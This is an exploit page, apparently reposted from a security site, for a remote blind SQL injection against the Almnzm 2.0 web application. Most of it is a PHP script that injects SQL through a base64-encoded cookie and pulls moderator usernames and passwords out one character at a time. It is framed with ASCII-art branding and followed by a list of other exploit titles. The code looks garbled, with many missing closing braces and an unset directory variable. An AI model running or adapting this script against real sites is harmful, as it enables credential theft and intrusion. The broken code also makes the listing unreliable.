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Almnzm 2.0 Remote Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:Qabandi 发布时间:2009-07-03  

                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

[q] Almnzm 2.0 Blind SQL Inj.      __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] Cookie <3                   /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] http://www.almnzm.com     |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[Tam al tableegh]-      \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
/                                                                              \
|                          hediya, because i finished exams                    |
                                \ No More Private /

if ($argc<6) {
Usage:   php '.$argv[0].' localhost /mnzm/ user_id username password
example: php '.$argv[0].' almnzm.com /demo/ 1 almnzm test
 function QABANDI($victim,$vic_dir,$user_id,$user_name,$user_pass,$injection){
$host = $victim;
$usrid= $user_id;
$usrnm= $user_name;
$usrpw= $user_pass;
$p = "http://".$host.$vic_dir;

$user_id_inj = $usrid.$injection;
$qookie = base64_encode($user_id_inj."[:-:]".$usrnm."[:-:]".md5($usrpw));
          $packet ="GET ".$p."index.php?a=customerarea HTTP/1.0\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Cookie: customer=".$qookie.";\r\n";
          $packet.="Connection: Close\r\n\r\n";

 $o = @fsockopen($host, 80);
  echo "\n[x] No response...\n";
 fputs($o, $packet);
 while (!feof($o)) $data .= fread($o, 1024);
 $_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
 if ( !empty($_404) ){
  echo "\n[x] 404 Not Found... Make sure of path. \n";

                                           return $data;


$host1 = $argv[1];
$userid1= $argv[3];
$username1= $argv[4];
$userpass1= $argv[5];



if ($argc > 2) {

echo "\nPlease wait, this will take time, el9abr zain ;)\n";
$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
echo "\nExploiting:\n";
$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {

  $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0");

$laenge = strlen($q);
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;

                if ($j>9){
      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i));

                   if ($j<=9){
      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i));


      if (abs((100-($laenge/$r*100))) > $t-1) {

           if ($j>9){
         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
            if ($j<=9){
                  $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));



         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         $i = 122;
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;

             if ($j>9){

     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i);

                          if ($j<=9){

     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i);


      $laenge = strlen($hg);

      if (abs((100-($laenge/$r*100))) > $t-1) {
             if ($j>9){

         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));

                          if ($j<=9){

         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));

         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         $i = 102;

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·CVE-2012-0217 Intel sysret exp
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·Joomla Component EasyBook 1.1
·YourTube <= 2.0 Arbitrary Data
·win32 xp-sp3 beep and exitproc
·Joomla! versions prior to 1.5.
·Apple Safari 4.x JavaScript Re
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